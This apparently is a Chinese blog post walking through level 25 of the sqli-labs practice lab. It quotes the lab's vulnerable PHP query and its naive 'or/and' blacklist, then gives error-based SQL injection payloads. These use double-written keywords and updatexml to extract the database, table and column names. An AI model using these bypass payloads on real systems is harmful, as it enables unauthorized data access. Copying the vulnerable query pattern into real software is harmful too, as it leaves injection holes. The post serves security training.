sqli-labs25

最新推荐文章于 2022-10-09 14:41:56 发布

ter_ret

最新推荐文章于 2022-10-09 14:41:56 发布

阅读量464

点赞数

分类专栏： sql-labs 文章标签： sqii-labs

本文链接：https://blog.csdn.net/qq_53030229/article/details/125058622

版权

sql-labs 专栏收录该内容

9 篇文章 0 订阅

订阅专栏

文章目录

一、代码审计
二、SQL注入

一、代码审计

1、这个是代码和数据库交汇的地方，可以快速判断注入点和闭合方式

 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

2、这个是使用了正则匹配过滤掉and和or，i则是大小写都过滤

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

    return $id;
}

二、SQL注入

1、获取数据库

这里我们通过双写绕过过滤，双写相当于你过滤掉了一个and，但还保留一个and

?id=1' aandnd updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

在这里插入图片描述

2、获取数据表

这里infoorrmation里面的or使用双写，注意重点

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),0x7e),1)--+

在这里插入图片描述

3、获取字段

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='users'),0x7e),1)--+

在这里插入图片描述

ter_ret

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs25

文章目录一、代码审计二、SQL注入1、获取数据库2、获取数据表3、获取字段一、代码审计1、这个是代码和数据库交汇的地方，可以快速判断注入点和闭合方式 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";2、这个是使用了正则匹配过滤掉and和or，i则是大小写都过滤function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non cas
复制链接

扫一扫